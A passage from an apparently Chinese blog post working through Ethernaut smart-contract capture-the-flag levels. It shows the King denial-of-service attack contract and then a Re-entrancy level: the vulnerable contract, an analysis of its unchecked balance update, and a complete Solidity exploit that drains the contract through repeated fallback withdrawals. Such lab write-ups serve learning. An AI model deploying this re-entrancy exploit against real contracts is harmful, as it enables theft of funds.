<pre><code class="solidity">fromWei((await contract.prize()).toString());  // 0.001 eth
----------------------------------------------------------------------------
pragma solidity 0.4.18;

contract attack &#123;
    function attack(address _add) public payable &#123;
        _add.call.gas(1000000).value(msg.value)();
    &#125;

    function () public &#123;
        revert();
    &#125;
&#125;
----------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// ...

contract Attack &#123;
    receive() external payable &#123;
        revert(&quot;Error&quot;);
    &#125;

    function claimKing(address payable addr) external payable &#123;
        addr.call&#123;value: 0.0011 ether&#125;(&quot;&quot;);
    &#125;
&#125;
</code></pre>
<hr>
<h1 id="Re-entrancy"><a href="#Re-entrancy" class="headerlink" title="Re-entrancy"></a>Re-entrancy</h1><p>关卡要求：</p>
<p>​	这一关的目标是偷走合约的所有资产.</p>
<p>合约代码：</p>
<pre><code class="solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.6.12;

import &quot;openzeppelin-contracts-06/math/SafeMath.sol&quot;;

contract Reentrance &#123;
    using SafeMath for uint256;

    mapping(address =&gt; uint256) public balances;

    function donate(address _to) public payable &#123;
        balances[_to] = balances[_to].add(msg.value);
    &#125;

    function balanceOf(address _who) public view returns (uint256 balance) &#123;
        return balances[_who];
    &#125;

    function withdraw(uint256 _amount) public &#123;
        if (balances[msg.sender] &gt;= _amount) &#123;
            (bool result,) = msg.sender.call&#123;value: _amount&#125;(&quot;&quot;);
            if (result) &#123;
                _amount;
            &#125;
            balances[msg.sender] -= _amount;
        &#125;
    &#125;

    receive() external payable &#123;&#125;
&#125;
</code></pre>
<p>合约分析：</p>
<p>经典的重入攻击</p>
<p>注意题目使用的 Solidity 版本为 0.6.x, 这个版本不存在溢出检查, 因此 withdraw 方法的 <code>balances[msg.sender] -= _amount</code> 语句存在溢出风险, 这也是能执行重入的前提。</p>
<p>攻击流程：</p>
<pre><code class="solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.6.12;

import &quot;@openzeppelin/contracts-ethereum-package/contracts/math/SafeMath.sol&quot;;

contract Reentrance &#123;
  
  using SafeMath for uint256;
  mapping(address =&gt; uint) public balances;

  function donate(address _to) public payable &#123;
    balances[_to] = balances[_to].add(msg.value);
  &#125;

  function balanceOf(address _who) public view returns (uint balance) &#123;
    return balances[_who];
  &#125;

  function withdraw(uint _amount) public &#123;
    if(balances[msg.sender] &gt;= _amount) &#123;
      (bool result,) = msg.sender.call&#123;value:_amount&#125;(&quot;&quot;);
      if(result) &#123;
        _amount;
      &#125;
      balances[msg.sender] -= _amount;
    &#125;
  &#125;

  receive() external payable &#123;&#125;
&#125;

contract exploit &#123; 
  //设定目标合约地址
  Reentrance reentrance;
  constructor(address payable instance_add) public payable &#123;
    reentrance = Reentrance(instance_add);
  &#125;

  //重写fallback
  fallback() external payable &#123;
    if(address(reentrance).balance &gt;= 0 ether)&#123;
      reentrance.withdraw(0.001 ether);
    &#125;
  &#125;

  //攻击，调用withdraw
  function attack() external &#123;
    reentrance.donate&#123;value: 0.002 ether&#125;(address(this));
    reentrance.withdraw(0.001 ether);
  &#125;

  //查询余额
  function instance_balance() public view returns (uint) &#123;
    return address(reentrance).balance;
  &#125;

   
&#125;
</code></pre>
<p>部署合约时打入一些钱</p>
<p><img src="https://badboy0.oss-cn-beijing.aliyuncs.com/pictures/202408221953415.png" alt="image-20240822195337510"></p>
<p>使用函数查询实例合约中原有余额</p>
<p><img src="https://badboy0.oss-cn-beijing.aliyuncs.com/pictures/202408221957818.png" alt="image-20240822195703407"></p>
<p>攻击完成后再次查询余额，也可以在控制台查询</p>
<p><img src="https://badboy0.oss-cn-beijing.aliyuncs.com/pictures/202408221956161.png" alt="image-20240822195629790"></p>
<hr>
<p>[+] 更新中……</p>

    </div>
    
    
    
    
    
    
    
</div>

        </div>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/js/main.js"></script>
    
        <div id="vcomments"></div>

<script src="/js/lib/valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        app_id: 'cK3EM6xXJsj61hqqNmXWUQvx-gzGzoHsz',
        app_key: '4dyJwl1epUYkWuXh5gyOnl7b',
        visitor: 'true',
        placeholder: '留下点什么',
        serverURLs: 'https://ck3em6xx.lc-cn-n1-shared.com',
    });
</script>
            
    <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2024 坏孩子のSimple Blogs
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;坏孩子
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

</body>
</html>
